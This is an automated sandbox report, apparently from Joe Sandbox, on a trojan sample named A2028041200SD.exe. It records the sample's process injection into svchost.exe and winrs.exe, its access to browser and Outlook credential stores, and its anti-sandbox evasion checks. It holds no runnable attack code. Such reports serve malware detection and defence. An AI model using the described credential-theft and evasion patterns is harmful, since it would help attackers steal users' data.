Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035238E0	4_2_035238E0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035DFF09	4_2_035DFF09
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_034E3FD5	4_2_034E3FD5
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_034E3FD2	4_2_034E3FD2
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03521F92	4_2_03521F92
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035DFFB1	4_2_035DFFB1
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03529EB0	4_2_03529EB0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035D1D5A	4_2_035D1D5A
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03523D40	4_2_03523D40
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035D7D73	4_2_035D7D73
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_0353FDC0	4_2_0353FDC0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03599C32	4_2_03599C32
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035DFCF2	4_2_035DFCF2
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_02C51AE0	4_2_02C51AE0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_02C4CA07	4_2_02C4CA07
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_02C4CA10	4_2_02C4CA10
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_02C4AC10	4_2_02C4AC10
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_02C4CC30	4_2_02C4CC30
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_02C4AD56	4_2_02C4AD56
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_02C4AD60	4_2_02C4AD60
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_02C5338D	4_2_02C5338D
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_02C53390	4_2_02C53390
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_02C410A9	4_2_02C410A9
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_02C55190	4_2_02C55190
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_02C6B7E0	4_2_02C6B7E0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_0327E368	4_2_0327E368
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_0327E483	4_2_0327E483
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_0327CB83	4_2_0327CB83
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_0327E81D	4_2_0327E81D
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_0327D8E8	4_2_0327D8E8

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 034AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0342B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03475130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03487E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 034BF290 appears 105 times
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: String function: 00FFEC2F appears 68 times
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: String function: 01006AC0 appears 42 times
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: String function: 0100F8A0 appears 35 times
Source: C:\Windows\SysWOW64\winrs.exe	Code function: String function: 0358EA12 appears 86 times
Source: C:\Windows\SysWOW64\winrs.exe	Code function: String function: 0350B970 appears 280 times
Source: C:\Windows\SysWOW64\winrs.exe	Code function: String function: 03567E54 appears 111 times
Source: C:\Windows\SysWOW64\winrs.exe	Code function: String function: 03555130 appears 58 times
Source: C:\Windows\SysWOW64\winrs.exe	Code function: String function: 0359F290 appears 105 times

Source: A2028041200SD.exe, 00000000.00000003.2031966757.00000000035D3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs A2028041200SD.exe
Source: A2028041200SD.exe, 00000000.00000003.2030685819.000000000372D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs A2028041200SD.exe

Source: A2028041200SD.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@14/11

Source: C:\Users\user\Desktop\A2028041200SD.exe

Code function: 0_2_0102CE7A GetLastError,FormatMessageW,

0_2_0102CE7A

Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_0101AB84 AdjustTokenPrivileges,CloseHandle,		0_2_0101AB84
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_0101B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_0101B134

Source: C:\Users\user\Desktop\A2028041200SD.exe

Code function: 0_2_0102E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0102E1FD

Source: C:\Users\user\Desktop\A2028041200SD.exe

Code function: 0_2_01026532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,

0_2_01026532

Source: C:\Users\user\Desktop\A2028041200SD.exe

Code function: 0_2_0103C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,

0_2_0103C18C

Source: C:\Users\user\Desktop\A2028041200SD.exe

Code function: 0_2_00FE406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00FE406B

Source: C:\Users\user\Desktop\A2028041200SD.exe

File created: C:\Users\user\AppData\Local\Temp\autBD3.tmp

Jump to behavior

Source: A2028041200SD.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\A2028041200SD.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: winrs.exe, 00000004.00000002.3877333853.0000000002F10000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.2312222678.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.3877333853.0000000002F33000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.3877333853.0000000002F05000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: A2028041200SD.exe	ReversingLabs: Detection: 34%
Source: A2028041200SD.exe	Virustotal: Detection: 26%

Source: unknown	Process created: C:\Users\user\Desktop\A2028041200SD.exe "C:\Users\user\Desktop\A2028041200SD.exe"
Source: C:\Users\user\Desktop\A2028041200SD.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\A2028041200SD.exe"
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	Process created: C:\Windows\SysWOW64\winrs.exe "C:\Windows\SysWOW64\winrs.exe"
Source: C:\Windows\SysWOW64\winrs.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\A2028041200SD.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\A2028041200SD.exe"	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	Process created: C:\Windows\SysWOW64\winrs.exe "C:\Windows\SysWOW64\winrs.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\A2028041200SD.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2028041200SD.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2028041200SD.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2028041200SD.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2028041200SD.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2028041200SD.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2028041200SD.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2028041200SD.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2028041200SD.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2028041200SD.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2028041200SD.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2028041200SD.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2028041200SD.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\winrs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\winrs.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: A2028041200SD.exe

Static file information: File size 1223680 > 1048576

Source: A2028041200SD.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: A2028041200SD.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: A2028041200SD.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: A2028041200SD.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: A2028041200SD.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: A2028041200SD.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: A2028041200SD.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: winrs.pdbGCTL source: svchost.exe, 00000002.00000003.2099496166.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2099307666.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2099202207.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, ohrkzzHWPesnQB.exe, 00000003.00000002.3877672461.0000000000968000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ohrkzzHWPesnQB.exe, 00000003.00000002.3877856897.0000000000A8E000.00000002.00000001.01000000.00000004.sdmp, ohrkzzHWPesnQB.exe, 00000006.00000002.3877194283.0000000000A8E000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: A2028041200SD.exe, 00000000.00000003.2031620680.00000000034B0000.00000004.00001000.00020000.00000000.sdmp, A2028041200SD.exe, 00000000.00000003.2032085870.0000000003650000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2035223587.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2131944944.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2033687417.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2131944944.000000000359E000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.2134157557.000000000332B000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.3878592054.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.2131648548.0000000003179000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.3878592054.000000000367E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: A2028041200SD.exe, 00000000.00000003.2031620680.00000000034B0000.00000004.00001000.00020000.00000000.sdmp, A2028041200SD.exe, 00000000.00000003.2032085870.0000000003650000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2035223587.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2131944944.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2033687417.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2131944944.000000000359E000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, winrs.exe, 00000004.00000003.2134157557.000000000332B000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.3878592054.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.2131648548.0000000003179000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.3878592054.000000000367E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: winrs.pdb source: svchost.exe, 00000002.00000003.2099496166.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2099307666.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2099202207.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, ohrkzzHWPesnQB.exe, 00000003.00000002.3877672461.0000000000968000.00000004.00000020.00020000.00000000.sdmp

Source: A2028041200SD.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: A2028041200SD.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: A2028041200SD.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: A2028041200SD.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: A2028041200SD.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\A2028041200SD.exe

Code function: 0_2_00FFE01E LoadLibraryA,GetProcAddress,

0_2_00FFE01E

Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_01006B05 push ecx; ret	0_2_01006B18
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004051D0 push es; iretd	2_2_004051D2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040A9DB push edx; retf	2_2_0040A9DC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403220 push eax; ret	2_2_00403222
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00404A20 push esi; retf	2_2_00404A2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00404A23 push esi; retf	2_2_00404A2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040D376 push ds; ret	2_2_0040D388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00415BF3 push esi; retf	2_2_00415BFE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00423413 pushfd ; ret	2_2_00423437
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00406415 push edx; retf	2_2_0040641C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00414675 push ebp; retf	2_2_00414688
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040161B push E588A11Fh; iretd	2_2_00401623
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00417F6B push ebx; iretd	2_2_00417F71
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004087CB push es; ret	2_2_004087CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0340225F pushad ; ret	2_2_034027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034027FA pushad ; ret	2_2_034027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034309AD push ecx; mov dword ptr [esp], ecx	2_2_034309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0340283D push eax; iretd	2_2_03402858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0340135E push eax; iretd	2_2_03401369
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_034E225F pushad ; ret	4_2_034E27F9
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_034E27FA pushad ; ret	4_2_034E27F9
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035109AD push ecx; mov dword ptr [esp], ecx	4_2_035109B6
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_034E283D push eax; iretd	4_2_034E2858
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_034E135E push eax; iretd	4_2_034E1369
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_02C601F0 pushfd ; ret	4_2_02C60214
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_02C529D0 push esi; retf	4_2_02C529DB
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_02C54D48 push ebx; iretd	4_2_02C54D4E
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_02C431F2 push edx; retf	4_2_02C431F9
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_02C417FD push esi; retf	4_2_02C4180B
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_02C477B8 push edx; retf	4_2_02C477B9
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_02C5774F push edx; retf	4_2_02C57750

Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_01048111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_01048111
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_00FFEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00FFEB42

Source: C:\Users\user\Desktop\A2028041200SD.exe

Code function: 0_2_0100123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0100123A

Source: C:\Users\user\Desktop\A2028041200SD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2028041200SD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\A2028041200SD.exe	API/Special instruction interceptor: Address: A86C14
Source: C:\Windows\SysWOW64\winrs.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\winrs.exe	API/Special instruction interceptor: Address: 7FF8C88ED7E4
Source: C:\Windows\SysWOW64\winrs.exe	API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\winrs.exe	API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\winrs.exe	API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\winrs.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\winrs.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\winrs.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: A2028041200SD.exe, 00000000.00000003.2023636958.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, A2028041200SD.exe, 00000000.00000003.2023743329.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, A2028041200SD.exe, 00000000.00000002.2033261511.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: PROCMON.EXE

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0347096E rdtsc

2_2_0347096E

Source: C:\Users\user\Desktop\A2028041200SD.exe

Evaded block: after key decision

graph_0-95840

Source: C:\Users\user\Desktop\A2028041200SD.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-96657

Source: C:\Users\user\Desktop\A2028041200SD.exe	API coverage: 4.3 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.6 %
Source: C:\Windows\SysWOW64\winrs.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\winrs.exe TID: 4288	Thread sleep count: 48 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe TID: 4288	Thread sleep time: -96000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe TID: 2656	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe TID: 2656	Thread sleep time: -43500s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\winrs.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\winrs.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_01026CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_01026CA9
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_010260DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_010260DD
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_010263F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_010263F9
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_0102EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0102EB60
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_0102F56F FindFirstFileW,FindClose,	0_2_0102F56F
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_0102F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0102F5FA
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_01031B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_01031B2F
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_01031C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_01031C8A
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_01031F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_01031F94
